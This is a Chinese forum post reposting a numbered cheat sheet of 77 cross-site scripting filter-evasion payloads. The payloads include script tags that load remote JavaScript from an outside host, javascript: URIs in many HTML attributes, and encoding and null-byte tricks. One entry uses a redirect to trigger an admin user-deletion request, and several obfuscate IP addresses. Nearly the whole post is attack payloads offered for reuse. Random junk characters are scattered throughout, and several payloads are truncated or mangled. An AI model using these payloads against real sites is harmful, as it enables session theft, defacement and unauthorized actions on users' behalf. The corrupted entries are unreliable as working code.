貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; l: n( f: M6 D! z1 V; @4 m
/ U" X P. u+ ?7 D f6 a* C (1)普通的XSS JavaScript注入5 P2 y9 [7 z/ u5 W+ f( M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* P3 @! Y1 q. e. d; e* ~0 I" Y$ ^5 B1 E
{* l0 d& M. o: D5 G4 I& t (2)IMG标签XSS使用JavaScript命令
; F$ ]. P% X: z( @% M <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& U/ _+ v8 }) h1 \
+ n% _- X6 ~ G/ f% \% w
(3)IMG标签无分号无引号
5 Q4 H, {4 G3 E$ l, Y% S! V4 b+ R# e <IMG SRC=javascript:alert(‘XSS’)>- Q+ p/ H: t: H0 f1 J' z# ?; H9 V3 ]
$ I) j+ j/ i; ]* v2 R+ Z
(4)IMG标签大小写不敏感+ P8 x" X3 T' ~ b2 ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' Z' ]4 M! W4 m Y; y! P
7 [( Y5 L9 O% X t5 f3 J- M
(5)HTML编码(必须有分号)% ]3 P8 X9 _9 H4 k
<IMG SRC=javascript:alert(“XSS”)>
# x* u9 H& J) y: V" P) D
- ~8 g7 f3 _3 q1 k" W (6)修正缺陷IMG标签
8 @2 A1 ^% X. T$ V1 y0 s <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# n1 s8 H7 E7 W/ S5 \2 |& ^( P/ R- D# r! E+ l7 p' A7 Q( D
(7)formCharCode标签(计算器)
* z) j0 H. t/ i) d/ B" o <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ \7 L) X4 F! R6 [0 L" M( R2 g8 c1 {' ?( E
(8)UTF-8的Unicode编码(计算器)
0 q6 d$ c6 Z! @7 i9 b <IMG SRC=jav..省略..S')>
& B$ d! K6 Y9 V X- k
1 I$ a+ c; K1 f# b+ ?7 P/ A (9)7位的UTF-8的Unicode编码是没有分号的(计算器)! i3 D. l8 j1 g! Z
<IMG SRC=jav..省略..S')>% q2 ?4 M+ h7 T7 I
( h( c/ M3 [: d: Q (10)十六进制编码也是没有分号(计算器)2 ~9 Z: l$ e7 ~2 G8 N
<IMG SRC=java..省略..XSS')>
/ h+ R1 w4 y, h" ?
1 r9 G0 e0 F) A3 w/ l! S( e (11)嵌入式标签,将Javascript分开
0 n2 z8 Z; I1 ~6 ?: u <IMG SRC=”jav ascript:alert(‘XSS’);”>
2 {" y6 C( T0 i7 V& j; o, F- n' [$ N8 L
(12)嵌入式编码标签,将Javascript分开3 Y/ S# U0 N2 U/ X2 ]" f' p+ }
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 F; Y% G. V- q1 T
6 J) S; I. S* K3 L
(13)嵌入式换行符
8 f+ v6 Q7 `- K2 ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>
; ]! D3 ?: U8 I8 A6 }# t: H6 ^
; [# f4 h1 X: I (14)嵌入式回车% |! |( q% g; X% l5 _# Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ ?6 z b/ d+ t7 R' ?' d9 e$ F9 ?) `! C' y
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% H6 P8 t& U9 I& y) N <IMG SRC=”javascript:alert(‘XSS‘)”>* k) p5 [3 Z4 W+ m6 w
5 L8 f1 m' ?/ C4 b1 P ` (16)解决限制字符(要求同页面)$ w9 m$ I. `, x* X. I2 j% Z7 e' a4 f
<script>z=’document.’</script>
2 J! y8 K7 h6 C+ x- z* B: M: Y <script>z=z+’write(“‘</script>
* W4 {1 z9 p0 \+ D/ L <script>z=z+’<script’</script>
) w: h+ u; p) q% f+ G" t0 P <script>z=z+’ src=ht’</script>5 Y, k% V3 i+ j# l* l J
<script>z=z+’tp://ww’</script>) a5 X1 y* U. ~1 T6 e! E
<script>z=z+’w.shell’</script>! X4 {/ c. j" g* Y
<script>z=z+’.net/1.’</script>& \# G. }" W% G9 I
<script>z=z+’js></sc’</script>9 H R" Q! C) x4 c R! |+ e+ F
<script>z=z+’ript>”)’</script>
- f% V# a6 e: N e6 i: l <script>eval_r(z)</script>5 k8 e& B: n, [8 M/ x9 _
" \/ e# g d5 R2 c: G5 N1 H
(17)空字符2 P, {/ K B6 P4 |
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ B6 E3 R9 ]: @ V
" @* T, w7 W3 N+ g' `* j
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: I2 V# I: c5 c1 z& \! b perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% N* k$ W. G* c8 C4 `
: l9 q4 J$ o2 q0 G9 n
(19)Spaces和meta前的IMG标签; p, ?- h9 @# t3 z2 b1 K
<IMG SRC=” javascript:alert(‘XSS’);”>
, [3 ?/ `' R* @; Y
: m; h1 h+ G, A4 M6 k" y; b (20)Non-alpha-non-digit XSS
. t7 r* Q1 J' b4 H+ r <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 K/ Z: U0 T& R3 h$ h! @
& N# \$ L# ~9 u3 v& v
(21)Non-alpha-non-digit XSS to 2
! C9 A" Q/ q# c <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: \1 z8 }" \" u9 P3 n( i
% a0 Y0 C2 v- V: L( c* \
(22)Non-alpha-non-digit XSS to 3% H4 H. N1 B5 U6 A+ [3 F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ D) \2 S" I' V2 ~# J+ V, V
8 H) F1 N+ U6 l( o (23)双开括号+ }/ _( j5 m6 B' X. ^
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# d3 x3 \8 _" N& |$ _
K9 N, T9 m3 i& w (24)无结束脚本标记(仅火狐等浏览器)
. `. j/ u6 ?! q2 i1 D <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, I2 ]" T; r: O$ _# V1 j1 I5 F. l! W+ ]) u# S1 X' Y8 A6 E6 N; t" E3 I
(25)无结束脚本标记27 E u: z7 t4 R, M5 `5 A( S& ?
<SCRIPT SRC=//3w.org/XSS/xss.js>
% R, q* V4 M. P( B: w, ~ m% _ M
( j7 U/ T9 T+ ?2 G (26)半开的HTML/JavaScript XSS
% g5 e; m+ W; x' `; ~. o <IMG SRC=”javascript:alert(‘XSS’)”" {$ u j1 a8 J
4 i6 l8 \; T7 D2 V (27)双开角括号
/ z @; [ `5 d7 Z' N [1 m <iframe src=http://3w.org/XSS.html <7 x6 O9 g: r0 R7 K! a8 c Y
4 G( Z7 S1 e$ n+ i" o8 }$ |4 X5 W
(28)无单引号 双引号 分号# \& K9 \$ E* O! F% c" |) {0 D P
<SCRIPT>a=/XSS/
& C1 B" l1 P% A& A alert(a.source)</SCRIPT>8 }& T4 i9 P8 b
/ A$ @1 Y6 V" z: J4 k! n/ v* c/ X5 A
(29)换码过滤的JavaScript. |8 |* M2 |& j. L5 V
\”;alert(‘XSS’);//
& J4 w+ f+ Z' K; p0 o. v6 v) k5 T; |+ B2 G
(30)结束Title标签" U# H: a) B k. E5 c4 ?5 B9 R
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; Q1 ~ }% P- _9 O! U
* O) l$ J' m7 C: l# P6 } (31)Input Image; `0 z. p2 k6 u4 N/ C
<INPUT SRC=”javascript:alert(‘XSS’);”>( ~$ e. I0 T) m" p2 D
# H: h* L z2 _' |5 W+ J. B6 ]! T r (32)BODY Image1 i( s- }1 ~4 g3 n$ \
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 D2 g) j3 R. L6 Z8 ]3 X9 C& ]$ Q8 q0 X8 W8 o
(33)BODY标签. `1 z( ?: g; u8 t4 g) b* T( |
<BODY(‘XSS’)>
2 `$ _& b1 p. r8 ]5 Y& H7 k: \
, ~: F) u8 E9 B5 q" o (34)IMG Dynsrc
0 v0 w: t. ]) y# y <IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 _8 W, g9 y9 ~% U/ _' b' H8 t6 L
(35)IMG Lowsrc4 N# G' h P" l
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
" f3 y* S+ J6 j% f& F( y L: {" Y0 h" u- O5 I2 u" `) l
(36)BGSOUND
/ Q$ f9 e3 O! l8 o) i2 _+ Q <BGSOUND SRC=”javascript:alert(‘XSS’);”>. y% f8 ` K0 j1 }% k2 W* `
' U4 a' y% U+ u! V7 J (37)STYLE sheet
3 g: \1 J1 W4 T6 e <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 }# K4 s; u( E/ T0 l8 }8 o7 U6 R
- D; C u6 J( i$ e/ g0 z* R) d% L
(38)远程样式表$ [8 u" r) b+ A; f# H5 I, _: J* D
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 R( u* y0 q% E' ~% A* D7 H! M% H( a: L3 C9 ]; L; N& W' R
(39)List-style-image(列表式)2 Y6 A$ ~9 l' o6 i) L6 s0 M! v; \
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, A7 W6 N" Z! n9 H! ]4 Z
/ k4 }2 H- G3 O
(40)IMG VBscript9 g- q0 I9 C, v( \8 }0 r$ A
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS& {/ l; ?* o z. f. G& l5 e9 Q: T
0 p9 A1 m5 e$ e, f (41)META链接url
6 k- L7 u7 T! I) d( v" U- @ <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( g0 {6 A, a" ^3 s, J: a+ I& H
% E @0 \' ^# b (42)Iframe/ G" d- y4 `9 C7 e
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 L; S7 g5 V. S6 l) F6 H, _" X: O7 u" G3 c% W' @/ x) G
(43)Frame
: D2 H- Y! S2 B9 j: k, { <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>/ p; k' U' q, `; S" E6 @8 t6 b2 u5 q5 O
5 C* {9 c1 C+ _, l5 [
(44)Table
' j! C# d( Z: O% ~" ?; a, l <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 [- {. K9 y; n8 H
- D! V" Z2 n: i1 W; i M5 s (45)TD
4 ]( i' J* Z) w- [/ E3 [) m+ ] <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% x' x* I; T: ^
3 [6 d8 w% j7 j) N( K$ G. |
(46)DIV background-image
' P) n& a2 u2 o' Q; [. `; h3 N <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" N4 [: }2 O o. N1 C( V/ D+ d% J/ K- }$ H
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)! A% a( B$ V4 e1 X: T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
: r4 P. C0 K/ F" H, |) Z; c" R \ X6 _1 M$ h9 A E. L
(48)DIV expression
+ I5 i ?% k9 ?' V$ l; E2 g <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ m) Z( O+ m4 ]2 t
: \/ R0 s- K1 Y* \. a0 }$ Q; D2 c3 b (49)STYLE属性分拆表达
! B4 U; D9 G5 E; b+ g+ |: r( A <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 S( _. R/ p" X( p5 }0 P) U
+ ]- H2 t6 ?# i; ]( Z (50)匿名STYLE(组成:开角号和一个字母开头) s! w( g0 A% \5 ~! ^
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, {) H s P3 ?' q- L- t
/ M6 i; K) X1 | (51)STYLE background-image
( D2 A* ~, u- E% ?3 U+ n9 `7 o$ j/ W <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>: Y8 L3 T" }7 s; @) C! \
" v3 c, M, U; E4 S" B7 w8 E% K
(52)IMG STYLE方式
1 B1 I6 d4 q5 l* i Z0 L$ U exppression(alert(“XSS”))’>
5 W+ g m9 F/ R4 j# z" m1 F; s- }3 L, ]8 y3 y& R/ a9 q5 ]
(53)STYLE background1 c+ n: U3 w9 h" @' V3 r
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 |+ T0 i- e+ i) l0 `7 l2 k! V- y0 O5 v( y6 p* b
(54)BASE6 Z$ Z7 m+ f8 n0 x* `( }5 O! y- h
<BASE HREF=”javascript:alert(‘XSS’);//”>9 J6 l: l, S& A: X+ T' T6 R
) I+ e( D, F" V; W# C. K (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 l, ?# L' E" B3 Q* t <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, S+ Y6 G0 o3 e p8 J
5 t! y$ R: h7 r. ]2 F0 Y) a" D' Q
(56)在flash中使用ActionScrpt可以混进你XSS的代码
: x2 c: Y( m R/ ? a=”get”;3 P- l& i0 W. Z! O$ K
b=”URL(\”";# D! p& S/ T; H0 ]1 ]# j
c=”javascript:”;1 S8 q( C6 T" b! J7 j
d=”alert(‘XSS’);\”)”;
& g+ \" P) C; Q4 `/ N( } eval_r(a+b+c+d);
7 l7 t A2 S- `# f d) N- v0 L5 k, \" }% S
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% _# m4 n& S) ?$ S. d <HTML xmlns:xss>
3 J1 u. f9 I9 m <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 {* ?5 a0 M1 Q2 s6 f0 ~) j
<xss:xss>XSS</xss:xss>, e! a3 |: P1 ~+ O7 J6 Z
</HTML>$ d! E) q4 I$ q. ^$ P |; g/ x; y
3 _9 z5 I" V) y
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- \/ _% x4 u5 {* Z <SCRIPT SRC=””></SCRIPT>
- b* b& l+ S! r1 L$ |; V) B2 G4 o) }$ v
(59)IMG嵌入式命令,可执行任意命令+ Y# Y& _. W, Z- ?6 {0 B6 }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>- K) h# q( n) l, x5 Z9 o" T1 ?
0 K( h m# K! h" h0 w: `1 T; v (60)IMG嵌入式命令(a.jpg在同服务器)6 x' u2 R, V$ q. k) L' {* D2 Y
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 C5 L5 P2 z2 c8 Z8 S8 q
1 W" x/ s0 P* d% r# ]: Z (61)绕符号过滤
' x0 y: W" f% O. i- K q/ D <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 {/ |& F2 S8 W8 ~6 s
5 ]2 u. c8 Q% c4 i (62)
+ R* ?7 M: ~, n! j7 l5 L ? <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 C( [; J5 [5 g* ^5 ? i! Y D- X* j$ P, V2 |, A
(63)
( m" |+ a# d. c- Z9 _ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
/ [+ y* \# n- f* S
0 ` H H$ `6 _# Z+ D1 s2 e (64)! a2 }& I& R8 n( _0 S- @( a5 z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; i8 ]0 g3 W3 u% |- B/ Y7 p) V. l' s" q7 W5 V
(65)' I6 H* f* F! z* C1 i
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>& m0 i/ ?7 b- ~3 y6 B+ o
/ b" l' @; y6 B% Y/ }, n (66)* W0 E0 R1 H& a! R/ p- H8 n
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- a# m3 P& x# i$ U3 t) G1 t
$ J4 S+ Z: o1 P. { (67)( i; O5 a- l' q+ O
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>6 g& ^7 w% _$ c) \
# e$ K9 F* C' I: G. \ (68)URL绕行
3 |+ n) _. j( z7 W3 m4 g0 j) | <A HREF=”http://127.0.0.1/”>XSS</A>6 B4 ?' Z" n1 v! X
5 E- y5 O+ p6 v/ J, W1 x
(69)URL编码
- f6 A" ~) ]8 }- ` <A HREF=”http://3w.org”>XSS</A>
: f8 d3 S; v9 \' r, ]- z7 a4 z. v" b0 o6 r- t$ l- n
(70)IP十进制
- ?( \& G3 m! r <A HREF=”http://3232235521″>XSS</A>3 r# G& R; k# e4 b5 ~
1 L+ s# ]) y: g
(71)IP十六进制
# S' C0 J0 B8 t0 R; K) f- a <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 n/ [! ~5 ? U4 P1 D- b$ m6 D' x5 D! C7 J9 B2 F, j
(72)IP八进制
+ c+ l7 H/ ^) a <A HREF=”http://0300.0250.0000.0001″>XSS</A>
' [6 _1 G3 m) p3 o2 a4 C3 ^6 O
(73)混合编码- _$ A! Q6 }( \# E. R e
<A HREF=”h
5 c; A! m# L' y tt p://6 6.000146.0×7.147/”">XSS</A>
- n) u# h. a; Y& G- B1 t' f+ U3 P* I
7 ]+ ^1 z/ _' l" ^. R8 d" A (74)节省[http:]4 C# I* O+ n% @8 F4 x) n
<A HREF=”//www.google.com/”>XSS</A>- z8 e$ J1 ^! ]8 `
2 y8 B ?: k" I) ~6 M$ C
(75)节省[www]
/ y7 p" Y: X9 V; @* B <A HREF=”http://google.com/”>XSS</A>
0 |% N0 x# J% w4 [
6 X0 u6 a1 ]! I% ~ ]0 V' E( e (76)绝对点绝对DNS
5 ^( l! }/ o; a# ?; ^4 h- p <A HREF=”http://www.google.com./”>XSS</A>
! t0 U$ E; s# }/ q, n9 J3 ^
! ^ | C9 F0 M4 W! ]; T (77)javascript链接6 j5 f1 N$ k$ Y/ p2 C# {
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |